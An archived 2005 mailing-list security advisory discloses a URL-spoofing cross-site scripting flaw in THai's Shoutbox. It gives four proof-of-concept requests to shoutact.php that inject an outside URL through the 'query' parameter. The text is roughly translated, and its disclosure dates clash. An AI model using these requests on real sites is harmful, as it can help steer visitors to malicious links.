lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000f01c532fe$55d52080$0100a8c0@server>
Date: Sun Mar 27 19:54:09 2005
From: corryl at sitoverde.com (CorryL)
Subject: THai's Shoutbox XSS (Spoofing URL) BUG

-=[--------------------ADVISORY-------------------]=-
-=[                                                                         
     ]=-
-=[                THai's Shoutbox                                     ]=-
-=[                                                                         
     ]=-
-=[  Author: CorryL           www.x0n3-h4ck.org          ]=-
-=[                                                                         
     ]=-
-=[----------------------------------------------------]=-


-=[+] Application:    THai's Shoutbox
-=[+] Version:        not available
-=[+] Vendor's URL:   not available
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       XSS spoofing url
-=[+] Exploitation:   Remote/Local
-=[-]
-=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck


..::[ Descriprion ]::..

THai's Shoutbox and' a small glass showcase where the consumers of his/her
own site can leave messages,
and' very easy to use and to install, it doesn't need database mysql


..::[ Bug ]::..

this application and' he/she cuts from a bug type XSS a remote attaccker it
is able' to exploit this bug for spoofing a malignant url

..::[ Proof Of Concept ]::..

/shoutact.php?yousay=default&query=http://www.x0n3-h4ck.org
/shoutact.php?yousay=default&name=default&query=http://www.x0n3-h4ck.org
/shoutact.php?yousay=default&email=default&query=http://www.x0n3-h4ck.org
/shoutact.php?yousay=default&email=default&name=default&query=http://www.x0n
3-h4ck.org


..::[ Workaround ]::..

Vendor not avaliable



..::[ Disclousure Timeline ]::..

[27/03/2005] - No patch relase from vendor (not avaliable)
[27/02/2005] - Public disclousure

CorryL
corryl80@...il.com
www.x0n3-h4ck.org
Italian Security Team
Fax (+39) 02700520894
Tel (+39) 06452215277
irc.xoned.net #x0n3-h4ck

_________________________________
www.seekstat.it is your web stat

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ